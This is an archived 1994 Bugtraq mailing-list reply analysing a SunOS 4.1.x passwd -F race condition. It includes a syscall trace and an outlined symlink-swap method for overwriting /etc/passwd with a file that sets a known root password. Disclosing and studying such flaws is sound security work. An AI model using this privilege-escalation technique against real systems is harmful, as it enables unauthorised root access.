[531] in bugtraq
Re: Sun Patch Id #102060-01
daemon@ATHENA.MIT.EDU (der Mouse)
Mon Dec 19 06:26:03 1994
Date: Mon, 19 Dec 1994 04:30:38 -0500
From: der Mouse <mouse@Collatz.McRCIM.McGill.EDU>
To: bugtraq@fc.net
> So does anybody know more about this one??? I've tried a few things,
> but haven't figured it out yet. [...]
> Problem Description:
> 1169007: Security: Root access possible on SunOS 4.1.x via forced passwd
> race condition.
> This patch restricts the use of the passwd command's -F option [...]
I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep
and ran "passwd -F /tmp/gleep" under the control of trc. Here's the
trace, edited to emphasize the relevant excerpts:
open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3
[this is the first time /tmp/gleep appears in the trace]
fstat (3, 0xf7fff704) = 0
read (3, 0xc708, 8192) = 448: [the passwd file]
close (3) = 0
gethostname (0x9ae0, 64) = 0: [our hostname]
ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...]
write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58
access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory)
[I don't know how this may interact with shadow passwords.]
open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3
[catch SIGINT]
[frob tty settings]
[read new password]
[do it all over again, for second copy of new password]
[do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP]
umask (0000) = 0022
open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3
[experimentation indicates the directory portion is taken from
/tmp/gleep's directory portion]
getdtablesize () = 64
setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4
fstat (4, 0xf7fff7dc) = 0
read (4, 0xcb98, 8192) = 448: [the passwd file]
fstat (3, 0xf7fff058) = 0
read (4, 0xcb98, 8192) = 0:
close (4) = 0
write (3, 0xeba0=[the passwd file with modified entry], 448) = 448
close (3) = 0
rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0
Thus, my idea of how one can exploit this is [note: this is not an
exploit script!] would be:
% mkdir bar
% cp /etc/passwd bar
[edit bar/passwd to have a known root password]
% ln -s /etc foo
% passwd -F $cwd/foo/passwd
Now, you need to relink foo to point to bar, somewhere between the open
of $cwd/foo/ptmp and the open of $cwd/tmp/passwd, and then relink it
back before the rename() occurs. If the passwd file is large, hitting
the second window may not be hard.
der Mouse
mouse@collatz.mcrcim.mcgill.edu
